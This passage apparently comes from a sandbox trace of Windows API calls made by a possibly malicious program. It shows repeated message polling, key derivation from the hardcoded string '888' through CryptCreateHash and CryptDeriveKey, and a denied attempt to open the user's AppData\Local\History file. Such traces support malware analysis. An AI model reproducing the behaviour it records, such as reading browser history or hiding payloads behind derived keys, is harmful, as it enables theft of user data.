wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.337] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0168.337] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.338] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0168.338] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.338] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.338] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.338] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.338] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.338] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.338] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.338] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.338] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.338] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0168.338] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.338] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0168.338] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.338] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.338] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.338] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.338] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.338] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.338] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.338] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.338] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.338] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.338] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.339] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0168.339] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.339] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0168.339] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.339] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.339] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0168.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaacd8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0168.339] CryptCreateHash (in: hProv=0x9bf330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0168.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0168.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0168.339] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0168.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0168.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0168.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.339] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.340] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.340] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.340] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.340] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.340] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0168.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaad98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0168.340] CryptHashData (hHash=0x9e1fb8, pbData=0x2a72708, dwDataLen=0x3, dwFlags=0x1) returned 1 [0168.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.340] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.340] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.340] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.340] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.340] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.340] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0168.340] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.340] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0168.340] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.340] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.340] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0168.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaab58, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0168.341] CryptDeriveKey (in: hProv=0x9bf330, Algid=0x6601, hBaseData=0x9e1fb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1ef8) returned 1 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0168.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0168.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0168.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0168.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0168.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0168.343] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0168.343] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0168.343] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.343] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabb8 [0168.343] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.343] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0168.343] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0168.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0168.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0168.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f7060 [0168.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0168.344] CryptDestroyHash (hHash=0x9e1fb8) returned 1 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabb8 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0168.344] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabb8 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0168.344] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0168.344] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.344] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.344] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0168.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0168.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.345] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/History" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\history"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0168.346] GetLastError () returned 0x5 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0168.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 